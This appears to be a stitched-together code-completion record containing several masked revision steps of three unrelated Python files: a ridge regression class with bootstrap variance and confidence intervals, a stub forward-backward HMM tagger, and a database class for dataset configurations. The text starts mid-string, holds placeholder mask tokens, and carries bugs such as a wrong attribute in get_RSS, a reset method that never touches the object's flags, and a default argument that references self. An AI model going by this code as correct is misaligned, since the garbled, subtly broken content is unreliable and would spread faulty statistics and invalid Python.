np.linalg.pinv(s_X.T.dot(s_X) + this.lmb *\n np.identity(n)).dot(s_X.T).dot(s_y)[:, 0]\n betameans = betasamples.sum(axis=1, keepdims=True) / B\n this.var_vector = np.sum((betasamples - betameans) ** 2, axis=1) / B\n return this.var_vector\n\n def get_CI_of_beta(this, percentile=0.95):\n if this.beta is None:\n print('Error: Model is not fitted.')\n return None\n else:\n if not this.CIbeta_updated:\n stdcoeff = st.norm.ppf((1 - percentile) / 2)\n this.CI_beta = np.zeros((len(this.beta), 2))\n for i in range(len(this.beta)):\n this.CI_beta[i][0] = this.beta[i] + stdcoeff * np.sqrt(this\n .var_vector[i])\n this.CI_beta[i][1] = this.beta[i] - stdcoeff * np.sqrt(this\n .var_vector[i])\n this.CIbeta_updated = True\n return this.CI_beta\n\n def set_updated_to_false(this):\n covariance_matrix_updated = False\n var_vector_updated = False\n y_tilde_updated = False\n CIbeta_updated = False\n", "step-3": "<mask token>\n\n\nclass RidgeLinearModel:\n covariance_matrix = None\n covariance_matrix_updated = False\n beta = None\n var_vector = None\n var_vector_updated = False\n CIbeta = None\n CIbeta_updated = False\n x1 = None\n x2 = None\n y = None\n y_tilde = None\n y_tilde_updated = False\n\n def __init__(this, lmb, k):\n this.lmb = lmb\n this.k = k\n\n def fit(this, x1, x2, y):\n this.x1 = x1\n this.x2 = x2\n this.y = y\n m = x1.shape[0]\n n = SumOneToN(this.k + 1)\n this.X = np.ones((m, n))\n for i in range(m):\n for p in range(this.k):\n for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)):\n this.X[i][SumOneToN(p + 1) + j] *= x1[i] ** (p + 1 - j\n ) * x2[i] ** j\n this.beta = np.linalg.pinv(this.X.T.dot(this.X) + this.lmb * np.\n identity(n)).dot(this.X.T).dot(y)\n this.set_updated_to_false()\n\n def predict(this, x1, x2):\n if this.beta is None:\n print('Error: Model is not fitted.')\n return None\n else:\n y = np.ones(x1.shape) * this.beta[0]\n for p in range(this.k):\n for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)):\n y += this.beta[SumOneToN(p + 1) + j] * x1 ** (p + 
1 - j\n ) * x2 ** j\n return y\n\n def get_RSS(this, x1, x2, y):\n if this.beta is None:\n print('Error: Model is not fitted.')\n return None\n else:\n y_tilde = this.predict(x1, x2)\n return RSS(y, this.y_tilde)\n\n def get_MSE(this, x1, x2, y):\n if this.beta is None:\n print('Error: Model is not fitted.')\n return None\n else:\n y_tilde = this.predict(x1, x2)\n return MSE(y, y_tilde)\n\n def get_R2Score(this, x1, x2, y):\n if this.beta is None:\n print('Error: Model is not fitted.')\n return None\n else:\n y_tilde = this.predict(x1, x2)\n return R2Score(y, y_tilde)\n\n def get_variance_of_betas(this, B=20):\n m = len(this.x1)\n n = SumOneToN(this.k + 1)\n betasamples = np.zeros((n, B))\n for b in range(B):\n c = np.random.choice(len(this.x1), len(this.x1))\n s_x1 = this.x1[c]\n s_x2 = this.x2[c]\n s_y = this.y[c]\n if len(s_y.shape) == 1:\n s_y = np.expand_dims(this.y[c], axis=1)\n s_X = np.ones((m, n))\n for i in range(m):\n for p in range(this.k):\n for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)):\n s_X[i][SumOneToN(p + 1) + j] *= s_x1[i] ** (p + 1 - j\n ) * s_x2[i] ** j\n betasamples[:, b] = np.linalg.pinv(s_X.T.dot(s_X) + this.lmb *\n np.identity(n)).dot(s_X.T).dot(s_y)[:, 0]\n betameans = betasamples.sum(axis=1, keepdims=True) / B\n this.var_vector = np.sum((betasamples - betameans) ** 2, axis=1) / B\n return this.var_vector\n\n def get_CI_of_beta(this, percentile=0.95):\n if this.beta is None:\n print('Error: Model is not fitted.')\n return None\n else:\n if not this.CIbeta_updated:\n stdcoeff = st.norm.ppf((1 - percentile) / 2)\n this.CI_beta = np.zeros((len(this.beta), 2))\n for i in range(len(this.beta)):\n this.CI_beta[i][0] = this.beta[i] + stdcoeff * np.sqrt(this\n .var_vector[i])\n this.CI_beta[i][1] = this.beta[i] - stdcoeff * np.sqrt(this\n .var_vector[i])\n this.CIbeta_updated = True\n return this.CI_beta\n\n def set_updated_to_false(this):\n covariance_matrix_updated = False\n var_vector_updated = False\n y_tilde_updated = False\n 
CIbeta_updated = False\n", "step-4": "from utilities import SumOneToN, RSS, MSE, R2Score\nimport numpy as np\nimport scipy.stats as st\n\n\nclass RidgeLinearModel:\n covariance_matrix = None\n covariance_matrix_updated = False\n beta = None\n var_vector = None\n var_vector_updated = False\n CIbeta = None\n CIbeta_updated = False\n x1 = None\n x2 = None\n y = None\n y_tilde = None\n y_tilde_updated = False\n\n def __init__(this, lmb, k):\n this.lmb = lmb\n this.k = k\n\n def fit(this, x1, x2, y):\n this.x1 = x1\n this.x2 = x2\n this.y = y\n m = x1.shape[0]\n n = SumOneToN(this.k + 1)\n this.X = np.ones((m, n))\n for i in range(m):\n for p in range(this.k):\n for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)):\n this.X[i][SumOneToN(p + 1) + j] *= x1[i] ** (p + 1 - j\n ) * x2[i] ** j\n this.beta = np.linalg.pinv(this.X.T.dot(this.X) + this.lmb * np.\n identity(n)).dot(this.X.T).dot(y)\n this.set_updated_to_false()\n\n def predict(this, x1, x2):\n if this.beta is None:\n print('Error: Model is not fitted.')\n return None\n else:\n y = np.ones(x1.shape) * this.beta[0]\n for p in range(this.k):\n for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)):\n y += this.beta[SumOneToN(p + 1) + j] * x1 ** (p + 1 - j\n ) * x2 ** j\n return y\n\n def get_RSS(this, x1, x2, y):\n if this.beta is None:\n print('Error: Model is not fitted.')\n return None\n else:\n y_tilde = this.predict(x1, x2)\n return RSS(y, this.y_tilde)\n\n def get_MSE(this, x1, x2, y):\n if this.beta is None:\n print('Error: Model is not fitted.')\n return None\n else:\n y_tilde = this.predict(x1, x2)\n return MSE(y, y_tilde)\n\n def get_R2Score(this, x1, x2, y):\n if this.beta is None:\n print('Error: Model is not fitted.')\n return None\n else:\n y_tilde = this.predict(x1, x2)\n return R2Score(y, y_tilde)\n\n def get_variance_of_betas(this, B=20):\n m = len(this.x1)\n n = SumOneToN(this.k + 1)\n betasamples = np.zeros((n, B))\n for b in range(B):\n c = np.random.choice(len(this.x1), len(this.x1))\n s_x1 = 
this.x1[c]\n s_x2 = this.x2[c]\n s_y = this.y[c]\n if len(s_y.shape) == 1:\n s_y = np.expand_dims(this.y[c], axis=1)\n s_X = np.ones((m, n))\n for i in range(m):\n for p in range(this.k):\n for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)):\n s_X[i][SumOneToN(p + 1) + j] *= s_x1[i] ** (p + 1 - j\n ) * s_x2[i] ** j\n betasamples[:, b] = np.linalg.pinv(s_X.T.dot(s_X) + this.lmb *\n np.identity(n)).dot(s_X.T).dot(s_y)[:, 0]\n betameans = betasamples.sum(axis=1, keepdims=True) / B\n this.var_vector = np.sum((betasamples - betameans) ** 2, axis=1) / B\n return this.var_vector\n\n def get_CI_of_beta(this, percentile=0.95):\n if this.beta is None:\n print('Error: Model is not fitted.')\n return None\n else:\n if not this.CIbeta_updated:\n stdcoeff = st.norm.ppf((1 - percentile) / 2)\n this.CI_beta = np.zeros((len(this.beta), 2))\n for i in range(len(this.beta)):\n this.CI_beta[i][0] = this.beta[i] + stdcoeff * np.sqrt(this\n .var_vector[i])\n this.CI_beta[i][1] = this.beta[i] - stdcoeff * np.sqrt(this\n .var_vector[i])\n this.CIbeta_updated = True\n return this.CI_beta\n\n def set_updated_to_false(this):\n covariance_matrix_updated = False\n var_vector_updated = False\n y_tilde_updated = False\n CIbeta_updated = False\n", "step-5": "from utilities import SumOneToN, RSS, MSE, R2Score\nimport numpy as np\nimport scipy.stats as st\n\nclass RidgeLinearModel:\n covariance_matrix = None # covariance matrix of the model coefficients\n covariance_matrix_updated = False\n beta = None # coefficients of the modelfunction\n var_vector = None\n var_vector_updated = False\n CIbeta = None # confidence interval of betas\n CIbeta_updated = False\n x1 = None # first predictor of sampledata\n x2 = None # second predictor of sampledata\n y = None # responses of sampledata\n y_tilde = None # model predictions for x\n y_tilde_updated = False\n\n\n def __init__(this, lmb, k):\n this.lmb = lmb # set lambda of model\n this.k = k # set order of polynomial\n\n\n # This function fits the model to 
the the sample data\n # using Ridge regression\n #\n # @x: array containing predictors\n # @y: array containing responses\n # @k: the degree of the polynomial to be fitted to the sample data\n # @lmb: lambda, determines the emphasize on minimizing the variance\n # of the model\n #\n def fit(this, x1, x2, y):\n # store x ands y for later computations\n this.x1 = x1\n this.x2 = x2\n this.y = y\n\n # calculate the dimensions of the design matrix\n m = x1.shape[0]\n n = SumOneToN(this.k + 1)\n\n # allocate design matrix\n this.X = np.ones((m, n))\n\n # compute values of design matrix\n for i in range(m): # vectoriser denne løkka\n for p in range(this.k):\n for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)):\n this.X[i][SumOneToN(p + 1) + j] *= x1[i]**(p\n + 1 - j)*x2[i]**j\n\n # compute linear regression coefficients\n this.beta = np.linalg.pinv(this.X.T.dot(this.X) +\n this.lmb*np.identity(n)).dot(this.X.T).dot(y)\n\n # stored statistical parameters are no longer valid\n this.set_updated_to_false()\n\n\n # Predicts and returns the responses of the predictors with\n # the fitted model if the model is fitted\n #\n # @x1: Columnvector containing the first predictor values\n # @x2: Columnvector containing the second predictor values\n #\n def predict(this, x1, x2):\n if this.beta is None:\n print(\"Error: Model is not fitted.\")\n return None\n else:\n # allocate meshgrid filled with constant term\n y = np.ones(x1.shape)*this.beta[0]\n\n # compute function values\n for p in range(this.k):\n for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)):\n y += this.beta[SumOneToN(p + 1)\n + j]*x1**(p+1-j)*x2**j\n\n return y\n\n\n # Returns the residuals of the model squared and summed\n def get_RSS(this, x1, x2, y):\n if this.beta is None:\n print(\"Error: Model is not fitted.\")\n return None\n else:\n y_tilde = this.predict(x1, x2)\n return RSS(y, this.y_tilde)\n\n\n # Returns the mean squared error of the model\n # given the sample data (x1, x2, y)\n #\n # @x1: vector of first 
predictor\n # @x2: vector of second predictor\n # @y: vector of responses\n #\n def get_MSE(this, x1, x2, y):\n if this.beta is None:\n print(\"Error: Model is not fitted.\")\n return None\n else:\n y_tilde = this.predict(x1, x2)\n return MSE(y, y_tilde)\n\n\n # Returns the R2 score of the model\n def get_R2Score(this, x1, x2, y):\n if this.beta is None:\n print(\"Error: Model is not fitted.\")\n return None\n else:\n y_tilde = this.predict(x1, x2)\n return R2Score(y, y_tilde)\n\n\n # Computes the sample variance of the coefficients of the model\n # @B: The number of samples used\n def get_variance_of_betas(this, B=20):\n m = len(this.x1)\n n = SumOneToN(this.k + 1)\n betasamples = np.zeros((n, B))\n\n for b in range(B):\n # create bootstrapsample\n c = np.random.choice(len(this.x1), len(this.x1))\n s_x1 = this.x1[c]\n s_x2 = this.x2[c]\n s_y = this.y[c]\n # Next line fixes if y is one-dimensional\n if (len(s_y.shape)) == 1:\n s_y = np.expand_dims(this.y[c], axis=1)\n\n # allocate design matrix\n s_X = np.ones((m, n))\n\n # compute values of design matrix\n for i in range(m): # vectoriser denne løkka\n for p in range(this.k):\n for j in range(SumOneToN(p + 2) - SumOneToN(p + 1)):\n s_X[i][SumOneToN(p + 1) + j] *= s_x1[i]**(p\n + 1 - j)*s_x2[i]**j\n\n betasamples[:,b] = np.linalg.pinv(s_X.T.dot(s_X) +\n this.lmb*np.identity(n)).dot(s_X.T).dot(s_y)[:, 0]\n\n betameans = betasamples.sum(axis=1, keepdims=True)/B\n\n # Compute variance vector\n this.var_vector = np.sum((betasamples - betameans)**2, axis=1)/B\n\n return this.var_vector\n\n\n # Returns the confidence interval of the betas\n def get_CI_of_beta(this, percentile=.95):\n if this.beta is None:\n print(\"Error: Model is not fitted.\")\n return None\n else:\n if not this.CIbeta_updated:\n\n # stdcoeff is the z-score to the two-sided confidence interval\n stdcoeff = st.norm.ppf((1-percentile)/2)\n this.CI_beta = np.zeros((len(this.beta), 2))\n for i in range(len(this.beta)):\n this.CI_beta[i][0] = this.beta[i] + 
stdcoeff*np.sqrt(this.var_vector[i])\n this.CI_beta[i][1] = this.beta[i] - stdcoeff*np.sqrt(this.var_vector[i])\n\n this.CIbeta_updated = True\n # CI_beta returns a nx2 matrix with each row\n # representing the confidence interval to the corresponding beta\n return this.CI_beta\n\n\n def set_updated_to_false(this):\n covariance_matrix_updated = False\n var_vector_updated = False\n y_tilde_updated = False\n CIbeta_updated = False\n", "step-ids": [ 6, 10, 11, 12, 13 ] }
[ 6, 10, 11, 12, 13 ]
<|reserved_special_token_0|> class ForwardBackward(BaseTagger): <|reserved_special_token_0|> <|reserved_special_token_0|> def probabilities(self): """ Return the probabilities of a hidden state sequence given observed output sequence :return: """ raise NotImplementedError <|reserved_special_token_0|> def tag(self): """ alpha_t_i: probability of state S[i] at time t with the observed sequence O={o1, ..., oT} with lambda model """ self.alpha = self.prob_given_state() raise NotImplementedError <|reserved_special_token_1|> <|reserved_special_token_0|> class ForwardBackward(BaseTagger): <|reserved_special_token_0|> <|reserved_special_token_0|> def probabilities(self): """ Return the probabilities of a hidden state sequence given observed output sequence :return: """ raise NotImplementedError def prob_given_state(self, start=1, end=len(self.T)): """ Return the probabilities of output from "start" to "end" given current (hidden) state :param start: start of observing time :param end: end of observing time :return: probabilities. *********************** * return format * *********************** """ raise NotImplementedError def tag(self): """ alpha_t_i: probability of state S[i] at time t with the observed sequence O={o1, ..., oT} with lambda model """ self.alpha = self.prob_given_state() raise NotImplementedError <|reserved_special_token_1|> <|reserved_special_token_0|> class ForwardBackward(BaseTagger): <|reserved_special_token_0|> def __init__(self): """ Constructor """ self.path_to_file = check_for_terminal_argument() BaseTagger.__init__(self) raise NotImplementedError def probabilities(self): """ Return the probabilities of a hidden state sequence given observed output sequence :return: """ raise NotImplementedError def prob_given_state(self, start=1, end=len(self.T)): """ Return the probabilities of output from "start" to "end" given current (hidden) state :param start: start of observing time :param end: end of observing time :return: probabilities. 
*********************** * return format * *********************** """ raise NotImplementedError def tag(self): """ alpha_t_i: probability of state S[i] at time t with the observed sequence O={o1, ..., oT} with lambda model """ self.alpha = self.prob_given_state() raise NotImplementedError <|reserved_special_token_1|> import time from numpy import empty from src.utils import normalize_input_sentence, evaluate, add_begin_and_trailing_tag, check_for_terminal_argument from classes.BaseTagger import BaseTagger from src.CONSTANT import POS_TAG_KEYNAME, WORD_KEYNAME, TRUETAG_KEYNAME, DEFAULT_TRAINING_FILENAME import sys import os class ForwardBackward(BaseTagger): """ For Learning: Calculate probability of an observation sequence given a HMM: P(O | lambda) """ def __init__(self): """ Constructor """ self.path_to_file = check_for_terminal_argument() BaseTagger.__init__(self) raise NotImplementedError def probabilities(self): """ Return the probabilities of a hidden state sequence given observed output sequence :return: """ raise NotImplementedError def prob_given_state(self, start=1, end=len(self.T)): """ Return the probabilities of output from "start" to "end" given current (hidden) state :param start: start of observing time :param end: end of observing time :return: probabilities. 
*********************** * return format * *********************** """ raise NotImplementedError def tag(self): """ alpha_t_i: probability of state S[i] at time t with the observed sequence O={o1, ..., oT} with lambda model """ self.alpha = self.prob_given_state() raise NotImplementedError <|reserved_special_token_1|> import time from numpy import empty from src.utils import normalize_input_sentence, evaluate, add_begin_and_trailing_tag, check_for_terminal_argument from classes.BaseTagger import BaseTagger from src.CONSTANT import POS_TAG_KEYNAME, WORD_KEYNAME, TRUETAG_KEYNAME, DEFAULT_TRAINING_FILENAME import sys import os # TODO check all document class ForwardBackward(BaseTagger): """ For Learning: Calculate probability of an observation sequence given a HMM: P(O | lambda) """ def __init__(self): """ Constructor """ # TODO Need to seperate input reading into whether a class method or static function self.path_to_file = check_for_terminal_argument() BaseTagger.__init__(self) raise NotImplementedError def probabilities(self): """ Return the probabilities of a hidden state sequence given observed output sequence :return: """ raise NotImplementedError def prob_given_state(self, start=1, end=len(self.T)): # , start, end): """ Return the probabilities of output from "start" to "end" given current (hidden) state :param start: start of observing time :param end: end of observing time :return: probabilities. *********************** * return format * *********************** """ # for state_index in range(len(self.tagset)): # self.alpha[1][state_index] = 0 raise NotImplementedError def tag(self): """ alpha_t_i: probability of state S[i] at time t with the observed sequence O={o1, ..., oT} with lambda model """ self.alpha = self.prob_given_state() raise NotImplementedError
flexible
{ "blob_id": "8cc0314d48f81ceead863245443548297e8188f8", "index": 9610, "step-1": "<mask token>\n\n\nclass ForwardBackward(BaseTagger):\n <mask token>\n <mask token>\n\n def probabilities(self):\n \"\"\"\n Return the probabilities of a hidden state sequence given observed output sequence\n :return:\n \"\"\"\n raise NotImplementedError\n <mask token>\n\n def tag(self):\n \"\"\"\n alpha_t_i: probability of state S[i] at time t with the observed sequence O={o1, ..., oT} with lambda\n model\n \"\"\"\n self.alpha = self.prob_given_state()\n raise NotImplementedError\n", "step-2": "<mask token>\n\n\nclass ForwardBackward(BaseTagger):\n <mask token>\n <mask token>\n\n def probabilities(self):\n \"\"\"\n Return the probabilities of a hidden state sequence given observed output sequence\n :return:\n \"\"\"\n raise NotImplementedError\n\n def prob_given_state(self, start=1, end=len(self.T)):\n \"\"\"\n Return the probabilities of output from \"start\" to \"end\" given current (hidden) state\n :param start: start of observing time\n :param end: end of observing time\n :return: probabilities.\n ***********************\n * return format *\n ***********************\n \"\"\"\n raise NotImplementedError\n\n def tag(self):\n \"\"\"\n alpha_t_i: probability of state S[i] at time t with the observed sequence O={o1, ..., oT} with lambda\n model\n \"\"\"\n self.alpha = self.prob_given_state()\n raise NotImplementedError\n", "step-3": "<mask token>\n\n\nclass ForwardBackward(BaseTagger):\n <mask token>\n\n def __init__(self):\n \"\"\"\n Constructor\n \"\"\"\n self.path_to_file = check_for_terminal_argument()\n BaseTagger.__init__(self)\n raise NotImplementedError\n\n def probabilities(self):\n \"\"\"\n Return the probabilities of a hidden state sequence given observed output sequence\n :return:\n \"\"\"\n raise NotImplementedError\n\n def prob_given_state(self, start=1, end=len(self.T)):\n \"\"\"\n Return the probabilities of output from \"start\" to \"end\" given current (hidden) 
state\n :param start: start of observing time\n :param end: end of observing time\n :return: probabilities.\n ***********************\n * return format *\n ***********************\n \"\"\"\n raise NotImplementedError\n\n def tag(self):\n \"\"\"\n alpha_t_i: probability of state S[i] at time t with the observed sequence O={o1, ..., oT} with lambda\n model\n \"\"\"\n self.alpha = self.prob_given_state()\n raise NotImplementedError\n", "step-4": "import time\nfrom numpy import empty\nfrom src.utils import normalize_input_sentence, evaluate, add_begin_and_trailing_tag, check_for_terminal_argument\nfrom classes.BaseTagger import BaseTagger\nfrom src.CONSTANT import POS_TAG_KEYNAME, WORD_KEYNAME, TRUETAG_KEYNAME, DEFAULT_TRAINING_FILENAME\nimport sys\nimport os\n\n\nclass ForwardBackward(BaseTagger):\n \"\"\"\n For Learning: Calculate probability of an observation sequence given a HMM: P(O | lambda)\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Constructor\n \"\"\"\n self.path_to_file = check_for_terminal_argument()\n BaseTagger.__init__(self)\n raise NotImplementedError\n\n def probabilities(self):\n \"\"\"\n Return the probabilities of a hidden state sequence given observed output sequence\n :return:\n \"\"\"\n raise NotImplementedError\n\n def prob_given_state(self, start=1, end=len(self.T)):\n \"\"\"\n Return the probabilities of output from \"start\" to \"end\" given current (hidden) state\n :param start: start of observing time\n :param end: end of observing time\n :return: probabilities.\n ***********************\n * return format *\n ***********************\n \"\"\"\n raise NotImplementedError\n\n def tag(self):\n \"\"\"\n alpha_t_i: probability of state S[i] at time t with the observed sequence O={o1, ..., oT} with lambda\n model\n \"\"\"\n self.alpha = self.prob_given_state()\n raise NotImplementedError\n", "step-5": "import time\n\nfrom numpy import empty\nfrom src.utils import normalize_input_sentence, evaluate, add_begin_and_trailing_tag, 
check_for_terminal_argument\nfrom classes.BaseTagger import BaseTagger\nfrom src.CONSTANT import POS_TAG_KEYNAME, WORD_KEYNAME, TRUETAG_KEYNAME, DEFAULT_TRAINING_FILENAME\nimport sys\nimport os\n\n\n# TODO check all document\n\nclass ForwardBackward(BaseTagger):\n \"\"\"\n For Learning: Calculate probability of an observation sequence given a HMM: P(O | lambda)\n \"\"\"\n\n def __init__(self):\n \"\"\"\n Constructor\n \"\"\"\n # TODO Need to seperate input reading into whether a class method or static function\n\n self.path_to_file = check_for_terminal_argument()\n BaseTagger.__init__(self)\n raise NotImplementedError\n\n def probabilities(self):\n \"\"\"\n Return the probabilities of a hidden state sequence given observed output sequence\n :return:\n \"\"\"\n raise NotImplementedError\n\n def prob_given_state(self, start=1, end=len(self.T)): # , start, end):\n \"\"\"\n Return the probabilities of output from \"start\" to \"end\" given current (hidden) state\n :param start: start of observing time\n :param end: end of observing time\n :return: probabilities.\n ***********************\n * return format *\n ***********************\n \"\"\"\n\n # for state_index in range(len(self.tagset)):\n # self.alpha[1][state_index] = 0\n\n raise NotImplementedError\n\n def tag(self):\n \"\"\"\n alpha_t_i: probability of state S[i] at time t with the observed sequence O={o1, ..., oT} with lambda\n model\n \"\"\"\n self.alpha = self.prob_given_state()\n\n raise NotImplementedError\n", "step-ids": [ 3, 4, 5, 7, 8 ] }
[ 3, 4, 5, 7, 8 ]
<|reserved_special_token_0|> class Dataset_conf_ds(object): <|reserved_special_token_0|> def __init__(self, id_ds_conf_ds=-1, value_configuration=-1, FK_id_configuration_DCT_DCD=-1, FK_id_dataset_DS_DCD=-1): """ Constructor of the DDI_interactionDB object. All the parameters have a default value :param id_ds_conf_ds: id of the configurations dataset - -1 if unknown :param value_configuration: value of the bins - -1 if unknown :param FK_id_configuration_DCT_DCD: FK of the configurations (see table DATASET_CONFIGURATIONS_TYPES)- -1 if unknown :param FK_id_dataset_DS_DCD: FK of the dataset (see table DATASETS) :type id_ds_conf_ds: int - not required :type value_configuration: int - not required :type FK_id_configuration_DCT_DCD: text (date format) - required :type FK_id_dataset_DS_DCD: int - required """ self.id_ds_conf_ds = id_ds_conf_ds self.value_configuration = value_configuration self.FK_id_configuration_DCT_DCD = FK_id_configuration_DCT_DCD self.FK_id_dataset_DS_DCD = FK_id_dataset_DS_DCD <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class Dataset_conf_ds(object): <|reserved_special_token_0|> def __init__(self, id_ds_conf_ds=-1, value_configuration=-1, FK_id_configuration_DCT_DCD=-1, FK_id_dataset_DS_DCD=-1): """ Constructor of the DDI_interactionDB object. 
All the parameters have a default value :param id_ds_conf_ds: id of the configurations dataset - -1 if unknown :param value_configuration: value of the bins - -1 if unknown :param FK_id_configuration_DCT_DCD: FK of the configurations (see table DATASET_CONFIGURATIONS_TYPES)- -1 if unknown :param FK_id_dataset_DS_DCD: FK of the dataset (see table DATASETS) :type id_ds_conf_ds: int - not required :type value_configuration: int - not required :type FK_id_configuration_DCT_DCD: text (date format) - required :type FK_id_dataset_DS_DCD: int - required """ self.id_ds_conf_ds = id_ds_conf_ds self.value_configuration = value_configuration self.FK_id_configuration_DCT_DCD = FK_id_configuration_DCT_DCD self.FK_id_dataset_DS_DCD = FK_id_dataset_DS_DCD <|reserved_special_token_0|> def create_ds_config_ds(self): """ Insert a dataset configuration of Dataset in the database return it id The ds_conf_ds contain: - value of the creation - FK of the configuration - FK of the dataset :return: id Dataset_conf_ds :rtype int """ sqlObj = _DS_config_DS_SQL() value_id_ds_conf_ds = sqlObj.insert_DS_conf_DS_return_id_if_not_exists( self.value_configuration, self.FK_id_configuration_DCT_DCD, self.FK_id_dataset_DS_DCD) self.id_ds_conf_ds = value_id_ds_conf_ds return value_id_ds_conf_ds <|reserved_special_token_1|> <|reserved_special_token_0|> class Dataset_conf_ds(object): """ This class treat the datasets configuration connection tables object has it exists in DATASET_CONF_DS table database NOTE: It consistes on a conection class (N to N) to know for each dataset with a given configuration By default, all FK are in the lasts positions in the parameters declaration """ def __init__(self, id_ds_conf_ds=-1, value_configuration=-1, FK_id_configuration_DCT_DCD=-1, FK_id_dataset_DS_DCD=-1): """ Constructor of the DDI_interactionDB object. 
All the parameters have a default value :param id_ds_conf_ds: id of the configurations dataset - -1 if unknown :param value_configuration: value of the bins - -1 if unknown :param FK_id_configuration_DCT_DCD: FK of the configurations (see table DATASET_CONFIGURATIONS_TYPES)- -1 if unknown :param FK_id_dataset_DS_DCD: FK of the dataset (see table DATASETS) :type id_ds_conf_ds: int - not required :type value_configuration: int - not required :type FK_id_configuration_DCT_DCD: text (date format) - required :type FK_id_dataset_DS_DCD: int - required """ self.id_ds_conf_ds = id_ds_conf_ds self.value_configuration = value_configuration self.FK_id_configuration_DCT_DCD = FK_id_configuration_DCT_DCD self.FK_id_dataset_DS_DCD = FK_id_dataset_DS_DCD def get_all_datasets_conf_ds(): """ return an array with all the configurations of datasets in the database :return: array of datasets configurations :rtype: array(DDI_interaction_DB) """ listOfDatasetDSConfig = [] sqlObj = _DS_config_DS_SQL() results = sqlObj.select_all_DDI_DB() for element in results: listOfDatasetDSConfig.append(Dataset_conf_ds(element[0], element[1], element[2], element[3])) return listOfDatasetDSConfig def create_ds_config_ds(self): """ Insert a dataset configuration of Dataset in the database return it id The ds_conf_ds contain: - value of the creation - FK of the configuration - FK of the dataset :return: id Dataset_conf_ds :rtype int """ sqlObj = _DS_config_DS_SQL() value_id_ds_conf_ds = sqlObj.insert_DS_conf_DS_return_id_if_not_exists( self.value_configuration, self.FK_id_configuration_DCT_DCD, self.FK_id_dataset_DS_DCD) self.id_ds_conf_ds = value_id_ds_conf_ds return value_id_ds_conf_ds <|reserved_special_token_1|> <|reserved_special_token_0|> from SQL_obj_new.Dataset_config_dataset_new_sql import _DS_config_DS_SQL class Dataset_conf_ds(object): """ This class treat the datasets configuration connection tables object has it exists in DATASET_CONF_DS table database NOTE: It consistes on a conection class 
(N to N) to know for each dataset with a given configuration By default, all FK are in the lasts positions in the parameters declaration """ def __init__(self, id_ds_conf_ds=-1, value_configuration=-1, FK_id_configuration_DCT_DCD=-1, FK_id_dataset_DS_DCD=-1): """ Constructor of the DDI_interactionDB object. All the parameters have a default value :param id_ds_conf_ds: id of the configurations dataset - -1 if unknown :param value_configuration: value of the bins - -1 if unknown :param FK_id_configuration_DCT_DCD: FK of the configurations (see table DATASET_CONFIGURATIONS_TYPES)- -1 if unknown :param FK_id_dataset_DS_DCD: FK of the dataset (see table DATASETS) :type id_ds_conf_ds: int - not required :type value_configuration: int - not required :type FK_id_configuration_DCT_DCD: text (date format) - required :type FK_id_dataset_DS_DCD: int - required """ self.id_ds_conf_ds = id_ds_conf_ds self.value_configuration = value_configuration self.FK_id_configuration_DCT_DCD = FK_id_configuration_DCT_DCD self.FK_id_dataset_DS_DCD = FK_id_dataset_DS_DCD def get_all_datasets_conf_ds(): """ return an array with all the configurations of datasets in the database :return: array of datasets configurations :rtype: array(DDI_interaction_DB) """ listOfDatasetDSConfig = [] sqlObj = _DS_config_DS_SQL() results = sqlObj.select_all_DDI_DB() for element in results: listOfDatasetDSConfig.append(Dataset_conf_ds(element[0], element[1], element[2], element[3])) return listOfDatasetDSConfig def create_ds_config_ds(self): """ Insert a dataset configuration of Dataset in the database return it id The ds_conf_ds contain: - value of the creation - FK of the configuration - FK of the dataset :return: id Dataset_conf_ds :rtype int """ sqlObj = _DS_config_DS_SQL() value_id_ds_conf_ds = sqlObj.insert_DS_conf_DS_return_id_if_not_exists( self.value_configuration, self.FK_id_configuration_DCT_DCD, self.FK_id_dataset_DS_DCD) self.id_ds_conf_ds = value_id_ds_conf_ds return value_id_ds_conf_ds 
<|reserved_special_token_1|> # -*- coding: utf-8 -*- """ Created on Tue Mai 15 11:34:22 2018 @author: Diogo Leite """ from SQL_obj_new.Dataset_config_dataset_new_sql import _DS_config_DS_SQL class Dataset_conf_ds(object): """ This class treat the datasets configuration connection tables object has it exists in DATASET_CONF_DS table database NOTE: It consistes on a conection class (N to N) to know for each dataset with a given configuration By default, all FK are in the lasts positions in the parameters declaration """ def __init__(self, id_ds_conf_ds = -1, value_configuration = -1, FK_id_configuration_DCT_DCD = -1, FK_id_dataset_DS_DCD = -1): """ Constructor of the DDI_interactionDB object. All the parameters have a default value :param id_ds_conf_ds: id of the configurations dataset - -1 if unknown :param value_configuration: value of the bins - -1 if unknown :param FK_id_configuration_DCT_DCD: FK of the configurations (see table DATASET_CONFIGURATIONS_TYPES)- -1 if unknown :param FK_id_dataset_DS_DCD: FK of the dataset (see table DATASETS) :type id_ds_conf_ds: int - not required :type value_configuration: int - not required :type FK_id_configuration_DCT_DCD: text (date format) - required :type FK_id_dataset_DS_DCD: int - required """ self.id_ds_conf_ds = id_ds_conf_ds self.value_configuration = value_configuration self.FK_id_configuration_DCT_DCD = FK_id_configuration_DCT_DCD self.FK_id_dataset_DS_DCD = FK_id_dataset_DS_DCD def get_all_datasets_conf_ds(): """ return an array with all the configurations of datasets in the database :return: array of datasets configurations :rtype: array(DDI_interaction_DB) """ listOfDatasetDSConfig = [] sqlObj = _DS_config_DS_SQL() results = sqlObj.select_all_DDI_DB() for element in results: listOfDatasetDSConfig.append(Dataset_conf_ds(element[0], element[1], element[2], element[3])) return listOfDatasetDSConfig def create_ds_config_ds(self): """ Insert a dataset configuration of Dataset in the database return it id The ds_conf_ds 
contain: - value of the creation - FK of the configuration - FK of the dataset :return: id Dataset_conf_ds :rtype int """ sqlObj = _DS_config_DS_SQL() value_id_ds_conf_ds = sqlObj.insert_DS_conf_DS_return_id_if_not_exists(self.value_configuration, self.FK_id_configuration_DCT_DCD, self.FK_id_dataset_DS_DCD) self.id_ds_conf_ds = value_id_ds_conf_ds return value_id_ds_conf_ds
flexible
